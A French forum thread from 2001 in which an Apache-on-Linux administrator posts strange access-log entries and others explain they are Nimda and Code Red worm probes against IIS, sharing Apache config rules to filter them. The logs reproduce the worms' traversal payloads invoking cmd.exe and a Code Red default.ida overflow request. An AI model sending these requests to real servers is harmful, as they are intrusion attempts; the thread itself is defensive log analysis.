Logs Apache bizarres ....

Logs Apache bizarres .... - Linux et OS Alternatifs

Marsh Posté le 18-09-2001 à 23:04:07    

j'ai mon serveur web apache (1.3.19) sous linux (mandrake 8.0).
de temps en temps je regarde le fichier log d'apache et ces temps ci, je constate la présence de ces lignes :
 
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:28 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.44.171 - - [18/Sep/2001:22:46:15 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.44.171 - - [18/Sep/2001:22:46:24 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:44 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.44.171 - - [18/Sep/2001:22:46:50 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.18.243 - - [18/Sep/2001:22:54:57 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.18.243 - - [18/Sep/2001:22:55:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
 
quelqu'un peut me dire ce que sont ces fichiers  ?? (winnt/system32/cmd.exe ...) ???
 
cela commence à m'inquiéter ...
 
merci d'avance

Reply

Marsh Posté le 18-09-2001 à 23:04:07   

Reply

Marsh Posté le 19-09-2001 à 02:51:44    

c'est un virus/vers windows qui essaie d'attaquer ta machine. Mais bon pour trouver des .exe et un rep winnt, il peut toujours se brosser.
 
news sur linuxfr
 
http://computerworld.com/nlt/1%2C3 [...] %2C00.html

 

[edtdd]--Message édité par Dark_Schneider--[/edtdd]


---------------
Mandriva : parce que nous le valons bien ! http://linux-wizard.net/index.php
Reply

Marsh Posté le 19-09-2001 à 23:03:59    

ok ...
mais que dois-je faire maintenant ? puis-je peux laisser faire sans risques pour mon serveur ?

Reply

Marsh Posté le 19-09-2001 à 23:16:08    

rien, tu es sous apache, or cette "daube" n'est efficace que contre IIS.
 
A part remplir tes logs, c'est tout ce que ca va te faire.


---------------
Un clavier azerty en vaut deux.
Reply

Marsh Posté le 20-09-2001 à 17:56:46    

Pour plus d'infos : http://www.securityspace.org/smyse [...] a_amm.html
 
Bien sur executer cmd.exe sur un linux il aura du mal ;)

Reply

Marsh Posté le 20-09-2001 à 17:58:22    

faudrait lui faire lancer wine avant...
c'est un virus de merde !
 
 
:D

Reply

Marsh Posté le 20-09-2001 à 18:02:34    

Faudrait surtout que les abrutis de concepteurs de cette merde regarde ce que c'est le server avant de lancer les lignes à la bourrain et rempli mon DD :o
 
Je vais finir par foutre un CRON pour faire un grep -v "c+dir" pour voir ce qu'il y a d'autre dans mon access apache :o
 
tiens aussi un code red :

Code :
  1. 217.11.165.110 - - [13/Sep/2001:22:46:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  2. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  3. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  4. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  5. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
  6. ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
  7. bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
  8. b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 281


 
aussi plein de lignes, si c'est pas malheureux de remplir un log apache sous linux avec des attaques IIS :lol:

Reply

Marsh Posté le 20-09-2001 à 18:16:49    

ben pas si leur but est aussi de saturer les réseaux et les machines infectées...

Reply

Marsh Posté le 20-09-2001 à 18:48:11    

httpd.conf chez moi :  
 
ErrorLog /web/apache/logs/error_log  
SetEnvIf Request_URI "\.exe$" nolog  
SetEnvIf Request_URI "\.ida$" nolog  
CustomLog /web/apache/logs/error_log common env=!nolog  
 
SetEnvIf Request_URI "\.ida$" nolog  
SetEnvIf Request_URI "\.exe$" nolog  
CustomLog /web/apache/logs/access_log common env=!nolog  
CustomLog /web/apache/logs/referer_log referer env=!nolog

 

[edtdd]--Message édité par nicotine--[/edtdd]


---------------
Do androïds dream of electric sheep ?
Reply

Marsh Posté le 20-09-2001 à 18:49:09    

ca allege tes logs de ces saloperies ...


---------------
Do androïds dream of electric sheep ?
Reply

Marsh Posté le 20-09-2001 à 18:49:09   

Reply

Marsh Posté le 21-09-2001 à 09:03:59    

Mais non, il faut les laisser dans les logs, et faire des trucs du genre : http://alrj.org/~allergy/nimda/
:)

Reply

Marsh Posté le 21-09-2001 à 11:46:06    

oui mais la dans ce cas tu ajoutes ces lignes pour pas polluer le log principal :) :
 
Custom /var/log/httpd/attack.err error env=nolog
 
 
Custom /var/log/httpd/attack.access common env=nolog
Custom /var/log/httpd/attack.refer refer env=nolog

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed